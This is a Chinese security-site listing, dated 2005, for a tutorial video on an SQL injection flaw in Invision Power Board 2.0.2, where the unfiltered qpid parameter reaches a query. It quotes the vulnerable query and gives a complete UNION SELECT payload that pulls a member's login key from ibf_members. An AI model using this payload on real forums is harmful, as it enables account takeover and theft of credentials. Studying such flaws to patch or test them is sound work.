安全中国首页 > 动画中心 > 综合注入动画找动画,点这里
 

IPB论坛漏洞测试

 
动画大小:2.52 MB
动画语言:简体中文
观看平台:Win9x/NT/2000/XP/2003
加入时间:2005-10-18
作者Q Q:不详
作者信箱:不详
作者网站:http://www.nspcn.org
动画评级:
动画介绍:GET[qpid]直接过来没有做任何处理漏洞就是qpid变量没有过滤引起的,下面是论坛程序中的关键的SQL语句,稍微分析下 implode(",", $a[’quoted_pids’]),这个字符串可以直接构造
implode函数解释:Returns a string containing a string representation of all the array elements in the same order, with the glue string between each element.算了不多说了,看如何构造注入语句首先IN (无法改变,只要吧后面的构造成1) 我们的语句,比如union select …………/*,注释掉最后一个括号整个构造好的语句:1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /*
这个是原始的查询语句,源码里的:"select p.*,t.forum_id FROM
".SQL_PREFIX."posts p LEFT JOIN ".SQL_PREFIX."topics t ON

(t.tid=p.topic_id)
WHERE pid IN (".implode(",",

$a[’quoted_pids’]).")"去论坛测试下,自己架设了一个ipb2.0.2,

下载地址:高速下载
 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
相关动画
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班